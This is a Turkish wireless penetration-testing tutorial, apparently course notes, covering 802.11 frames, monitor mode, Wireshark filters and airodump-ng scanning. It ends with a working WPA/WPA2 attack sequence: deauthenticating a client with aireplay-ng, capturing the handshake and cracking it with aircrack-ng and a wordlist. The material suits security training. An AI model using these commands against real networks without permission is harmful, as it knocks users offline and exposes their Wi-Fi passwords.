Kablosuz Ağ Güvenliği - Bölüm 1

Kaynaklar
Hacktrick'18 - Kablosuz Ağ Sızma Testleri - Besim Altınok


Bazı Temel Bilgiler

Modemler kendilerinin aktif olduğu belirtmek için etrafa Beacon paketleri yayarlar, bu sayede çevredeki aktif ağları görebiliriz.
Client modeme bağlanmak isterse, talep isteği olaran bir Probe Request paketi yollar.
Bu paketi alan modem Probe Response paketi ile cevap verir.
Eğer ağ şifreli ise Authentication Request ve Authentication Response aşamaları ile gerekli kontroller yapılmış olur.
Asociation Request ve Asociation Response aşamaları ile de bağlanma işlemi tamamlanır.

 • Beacon paketleri SSID, MAC adresi, Kanal numarası, Şifreleme tipi bilgilerini içerir.
 • Probe Request paketi sadece SSID içerir, MAC adresi içermez.

Ağ Kartı Modları

Managed Modu : Kablosuz ağa bağlanılabilir.

Master Modu : Erişim noktası hizmeti verebilir.

Monitor Modu : Herhangi bir erişim noktasına bağlanmadan ya da erişim noktası hizmeti vermeden direkt olarak havada uçan paketleri dinlenebilir.


Ağ Kartının Yapılandırılması

Ağ kartının şuanki durumunu gözlemlemek için aşağıdaki komut kullanılabilir.

	iwconfig wlan0

Ya da direkt iw ile de bilgi toplanabilir.

	iw wlan0 info

Monitor Modunu Aktifleştirmek

NOT
Monitor moduna geçmek için aşağıdaki işlemleri yapmak yerine airmon-ng kullanılabilir.
airmon-ng start wlan0

Monitor modunu aktifleştirmek için iwconfig kullanılabilir. Bunun için aşağıdaki adımları uygulamak gereklidir.

İlk olarak ağ kartı down edilmelidir.

	ifconfig wlan0 down

Ardından modu, monitor olarak ayarlanmalıdır.

	iwconfig wlan0 mode monitor

Son olarak ağ kartının up edilmesi gereklidir.

	ifconfig wlan0 up

Bu adımların ardından kartımızın monitor moduna geçtiğini görebiliriz.

	iwconfig wlan0

Belli Bir Kanalda Monitor Modunu Aktifleştirmek

Eğer ağ kartının belli bir kanalda monitor moduna geçirilmesi gerekiyorsa channel paremetresi kullanılır.

	iwconfig wlan0 channel 8

Wireshark ile Beacon ve Probe Paketlerinin İncelenmesi

Ağ kartımızı monitor moduna geçirdikten sonra etrafta uçan paketleri görmek için wlan0mon ile wireshark dinlemesini başlatabiliriz.

Belli bir SSID’i filtrelemek için wlan.ssid parametresini kullanabiliriz.

	wlan.ssid == "networkName"
 • Eğer belirli bir paket tipini incelemek istiyorsak, aşağıdaki parametreler kullanılabilir.
  • Sadece Beacon paketlerini görmek için 0x008
   	wlan.fc.type_subtype == 0x008
   
  • Sadece Probe Request paketlerini görmek için 0x004
   	wlan.fc.type_subtype == 0x004
   
  • Sadece Probe Response paketlerini görmek için 0x005
   	wlan.fc.type_subtype == 0x005
   

Ağın Şifreleme Türünü WireShark ile Tespit Etmek

WireShark’ta Beacon paketi incelenerek ağın şifreleme türü tespit edilebilir.

Beacon Paketinin Capabilites altında bulunan Privacy kısmı eğer 1 ise ağ şifreli demektir.

Şifreleme tipini öğrenmek için RSN tag’ine bakmak gerekir. Örneğin AES var ise WPA2 şifrelemesi vardır.


Çevredeki Ağların Tespit edilmesi

Ağ kartı monitor moda alınmamış olsa bile direkt airodump-ng wlan0 denilirse, cihaz monitor moda otomatik olarak geçirilir.

Airodump-ng ile aşağıdaki bilgileri elde edilebilir.

 • Kablosuz ağın ismi
 • Kablosuz ağın MAC adres bilgisi
 • Yayın yapılan kanal numarası
 • Şifreleme algoritması
 • Kablosuz ağlara bağlı istemcileri
 • İstemcilerin yolladığı probe isteklerinden kablosuz ağ isimleri

Kullanılabilir parametreler aşağıdaki gibidir.

ParametreAçıklama
–manufacturerCihazın üretici firmasını tespit etmek için
–uptimeErişim noktasının aktif olduğu süreyi görmek için
-f [zaman]Belli aralıklar ile kanal değiştirmek için
-w [file]Yakalanan paketleri kaydetmek için
–output-formatBelli bir formatta kaydetmek için (pcap, ivs, csv, gps, kismet, netxml)

Kullanılabilir filtreler aşağıdaki gibidir.

FiltreAçıklama
–wpsWPS korumalı ağları listeler.
–encrypt [encrypt]Şifreleme tipine göre bilgi toplamamızı sağlar.
–bssid [bssid]Belirli bir erişim noktası için bilgi toplar.
–essid [essid]Kablosuz ağ ismine göre bilgi toplar.
–channel [channel]Belirli bir kanal numarasına göre bilgi toplar.
–essid-regex [regex]Belirli bir kelime içeren ağları tespit için
–essid-regex ‘(?i)^regex’Belirli bir kelime içeren ama küçük/büyük harf fark etmeyen ağları tespit etmek için

Çevredeki ağlar aşağıdaki gibi tespit edilebilir.

	airodump-ng wlan0mon --manufacturer --uptime

Belirli bir ağın dinlenmesi ve cap uzantılı bir dosyaya kaydedilmesine aşağıdaki komut örnek verilebilir.

	airodump-ng wlan0mon --bssid A6:EB:1C:26:3C:EA --channel 3 -w outputFile --output-format cap
iwlist ile Ağların Tespiti

UNIX tabanlı sistemlerde iwlist tool’u ile çevredeki ağlar hakkında bilgi toplanabilir.
Örneğin aşağıdaki komut ile, çevredeki ağların ESSID değerleri elde edilebilir.

	iwlist wlan0 scanning | grep -i "ESSID"

Windows sistemlerde ise exid.it ile monitor moduna geçmeden dinleme yapılabilir.


Gizli Ağların Tespiti

Çevrede bulunan gizli ağların tespiti için ağ dinlemeye alınır eğer biri ağa bağlanır ise isim tespit edilmiş olur. İstemciler ağdan düşürülerek ağa tekrar bağlanması sağlanabilir.

	airodump-ng wlan0mon --bssid A6:EB:1C:26:3C:EA -c 6

İstemcilerin Ağdan Düşürülmesi

İstemcileri bağlı oldukları ağdan düşürmek için; modeme, hedef istemcinin ağdan ayrılmak istediğini belirten, Deauthentication paketleri yollanabilir.
Deauthentication paketleri modemin ve bağlantısını koparmak isteyen istemcinin MAC adresini içerir.

Bunun için aireplay-ng tool’u kullanılabilir. Genel kullanım aşağıdaki gibidir.
-a parametresinde modemin, -c parametresinde de hedef istemcinin MAC adresi girilir.
–deauth parametresi ile gönderilecek deauth paketi sayısı belirlenir, eğer 0 girilirse sonsuza kadar paket yollanır.

	aireplay-ng --deauth 3 -a A6:EB:1C:26:3C:EA -c 5E:9F:F5:19:FC:2A wlan0mon

Handshake Saldırısı ile Ağ Parolalarının Ele Geçirilmesi

WPA/WPA2 tipi şifrelemeye sahip ağlarda, parola ele geçilirmesi için handshake saldırı yönetimi kullanılabilir.
Bu saldırı yönteminde hedef ağ dinlemeye alınır ve istemcilerden birinin ağdan düşürülmesi ve ardından tekrar bağlanması ile bir handshake yakalanmaya çalışılır. Handshake paketleri elde edildikten sonra aircrack-ng tool’u ile dictionary saldırısı ile parola tespiti sağlanmaya çalışılır.

İlk olarak hedef ağın MAC adresini tespit etmek amaçlı çevredeki ağlar dinlenir.

	airodump-ng wlan0mon --manufacturer --uptime

Saldırılacak ağın MAC adresi alındıktan sonra aşağıdaki gibi bir dinleme başlatılır ve bu dinleme işlemi cap uzantılı bir dosyaya kayıt edilir. Eğer cap uzantılı dosya Wireshark’ta incelenir ise eapol filtresi ile handshake paketleri(her handshake 4 paketten oluşur) görülebilir.

	airodump-ng wlan0mon --bssid A6:EB:1C:26:3C:EA --channel 3 -w outputFile --output-format cap

Ardından bir handshake yakalamak amacıyla ağda bulunan istemcilerden biri ağdan düşürülür ve tekrar bağlanması beklenir. Eğer istemci ağa tekrar bağlanır ise handshake paketleri elde edilmiş olur.

	aireplay-ng --deauth 3 -a A6:EB:1C:26:3C:EA -c 5E:9F:F5:19:FC:2A wlan0mon

Handshake elde ediltikten sonra dinleme işlemi durdurulur ve dictionary saldırısı başlatılır. Dictionary saldırılarında kritik olan nokta sözlüğün hedefe göre hazırlanmasıdır.

	aircrack-ng -w ~/Documents/rockyou.txt -b A6:EB:1C:26:3C:EA outputFile.cap -0